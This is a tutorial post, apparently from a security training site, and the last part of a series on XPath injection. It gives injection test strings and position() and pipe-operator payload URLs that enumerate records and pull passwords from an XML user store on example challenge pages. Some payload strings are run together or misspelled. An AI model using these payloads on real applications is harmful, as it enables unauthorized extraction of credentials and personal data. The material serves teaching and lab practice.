Ready to Start Your Career?

Xpath Injection (Final)

Multi Thinker's profile image

By: Multi Thinker

July 8, 2015

1. Testing and confirming Xpathi

Testing for Xpath and confirming are the most important parts. Most of us, and specially the readers of security idiots, see SQLi everywhere and anywhere they find an error - even if the error is a Conversional Error, Internal Error or Programming Error. Sometimes, people assume that getting blocked by WAF upon typing "Union Select" means it's vulnerable to SQLi. When we see an input field, the first thing we'll do is make it true using the below tests:

1 or 1=11 or true' or ''='" or ""="

In the case of Xpath or SQLi and many other Injections, they will work the same. To confirm if it's Xpathi, we can use the position() function, which is specific to Xpathi. Here are few tests we can try:

1 or postition()=1 or 1=11 or postition()=1 or true' or postition()=1 or ''='" or postition()=1 or ""="

If any of the above works, then you can assume that the injection you are dealing with is a Xpath Injection. Below is an example XML file, which we'll be using throughout this tutorial:

<xmlfile><users> <user> <name first="example" last="example"/> <id>1</id> <username>Test</username> <password>T</password> <phone>123-456-7890</phone> </user> <user> <name first="example" last="example"/> <id>2</id> <username>example</username> <password>i_om-GAWWWD</password> <phone>603-478-4115</phone> </user> <user> <name first="example" last="example"/> <id>3</id> <username>example</username> <password>ihavemoregfsthanyou</password> <phone>222-222-2222</phone> </user> <user> <name first="example" last="example"/> <id>4</id> <username>example</username> <password>SelectPassFromDual</password> <phone>88-777 8989</phone> </user></users></xmlfile>

Here are some basic Xpath queries, which can be used to extract data from the above file:

To Extract username where id=1: /xmlfile/users/user[id='1']/username

To Extract username where id=2: /xmlfile/users/user[id='2']/username

To Extract password where username is Monster: /xmlfile/users/user[username="Monster"]/password

To Extract phone where username is Trojan and password is ihavemoregfsthanyou: /xmlfile/users/user[username="Trojan" and password="ihavemoregfsthanyou"]/phone

To Extract the first username: /xmlfile/users/user[position()=1]/username

Looking at all the above example queries, I believe it's clear enough to understand the basic way of extracting data using Xpath queries.

2. Iterating through the Nodes.

Let's try injecting it with Xpath. Before we start injecting, let's assume the query that could be working inside. It should be something like "/root/semething/user[username="<Our_Intput_here>"]/phone". Assuming this, let's try these injections:

http://example.net/challenge1/challenge_2.php?username='or''='

And we got the number of first user, now to get the number of second user we’ll use position() as I used before above

http://example.net/challenge1/challenge_2.php?username='or position()=2 and''='

And we got the number of Second user, so on we can keep changing position() to get the rest of users phone numbers.

http://example.net/challenge1/challenge_2.php?username='or position()=3 and''='

And we got the number of Third user, so on we can keep changing position() to get the rest of users phone numbers.

We're done iterating through the nodes, but the problem is we aren't able to extract the other details like passwords etc., which should and must be saved in the same XML file.

3. Extracting Data from Siblings

Until now, we were using position. We're able to enumerate through the nodes only, but /phone on the end is hard coded. We can't change it to extract other data. But fear not!! We have the Pipe operator, which works to combine two queries in Xpath. Here's how we can do this:

http://example.net/challenge1/challenge_2.php?username=' or position()=1]/*[2]|/a['
The above Injection extracts the Second Element from first node.

http://example.net/challenge1/challenge_2.php?username=' or position()=1]/*[3]|/a['
The above Injection extracts the Third Element from first node.

http://example.net/challenge1/challenge_2.php?username=' or position()=1]/*[4]|/a['
The above Injection extracts the Forth Element from first node.

http://example.net/challenge1/challenge_2.php?username=' or position()=1]/*[5]|/a['
The above Injection extracts the Fifth Element from first node.

http://example.net/challenge1/challenge_2.php?username=' or position()=2]/*[2]|/a['
Here I changed the position which means it will extract data from the second node second element, so on you can keep changing and extracting.

Using this, we can extract data with zero knowledge of the internal file structure. Here's a Xpathi challenge you can try, solving the above method:

Previous: Part 2

Thanks for reading this series of posts!
Schedule Demo
Build your Cybersecurity or IT Career
Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry